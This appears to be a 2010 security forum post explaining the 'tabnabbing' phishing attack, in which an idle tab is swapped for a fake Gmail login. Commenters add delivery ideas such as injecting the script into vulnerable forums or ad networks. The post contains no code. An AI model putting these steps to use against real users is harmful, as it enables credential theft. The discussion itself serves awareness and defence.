Tabnabbing new method for phishing.
New method for phishing discovered by Aza Raskin “creative” lead for firefox.
http://www.security.nl/artikel/33401/1/Duivelse_nieuwe_phishingaanval_gebruikt_tabs.html
I had to run this thru google translation service and it did a decent job but not perfect.
I modified it somewhat based on my understanding of the issue.
There is a good flash video that shows how the attack works.
Here are the steps as outlined in the translated version of his description.
User navigates to your normal looking site.
The phishing site detects when the page has lost focus and it hasn't been interacted with for a while.
Replace the favicon on the tab with the Google favicon, the title with "Gmail: Email from Google", and the page with a Google log look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.
The user scans their many tabs open, the favicon and title act as a strong visual cue and memory is malleable, moldable … and the user will simply think that they will most likely left a Gmail tab open. When they click back to the fake Gmail tab, they'll see the standard Gmail login page, assume they've been logged out, and provide their credentials to log in. When they click back to the Gmail tab fake, they'll see the standard Gmail login page, Assuming they've logged out, and provide their credentials to login. The attack preys on the perceived immutability of tabs.
Assuming the user had left a Gmail tab open where they had previously correctly authenticated. Also assuming the user has entered their login information and you've sent it back to your server, the phishing site can now redirect you to Gmail because they were never logged out in the first place, it will appear as if the login was successful.
Comments
not only that...I am pretty sure I am gonna notice if one of my tab fav icons changes suddenly while i'm sitting there.
now if i have walked away from my PC....that's a possibility I guess...
am I just missing something that would make this seem more prolific that it appears it would be?
Husaragi
May 25th 2010
1 decade ago
Add some automation like using reference URL, search term used to reach website and you already got clue what can be 'tab-jacked'.
Email account would probably be the highest successful one.
A.Champ
May 25th 2010
1 decade ago
However, instead of translating the page, you can read a similar English writeup at "the H" here:
http://www.h-online.com/open/news/item/New-phishing-attack-exploits-tabbed-browsing-1006386.html
(and in German here: http://www.heise.de/security/meldung/Phishing-per-Browser-Tabs-1006281.html)
Note that all pages refer to the following (English) blog page: http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
Bitwiper
May 25th 2010
1 decade ago
I see this happening: set up some innocent looking page, make sure it loads really slowly (or better, fake it with javascript to be sure), and then put the attack on that.
However, the url shown isn't changed, so that gives it away easily. Still, they only have to get a few users to make it worth their time if the site target has enough value per account.
Defenses... why does javascript need to be allowed to change the favicon?
Arnt
May 25th 2010
1 decade ago
Injecting JS to vulnerable forums/website related to a specific subject, without defacing it or hindering the user ability to use it to stay under the radar.
Example: Adding the JS sample to website related to a game, then faking that game official page or forum, with the JS when the user is tabbed elsewhere. Even better, simply push the JS script ads in a ads network and 'aim' specific website category.
On the corporate side, it could even be used when a partner or official website get injected/compromised. Even if that website doesn't require credential, if the JS fake some internal web-based tools, the success-rate might be interesting for the bad guy.
A.Champ
May 26th 2010
1 decade ago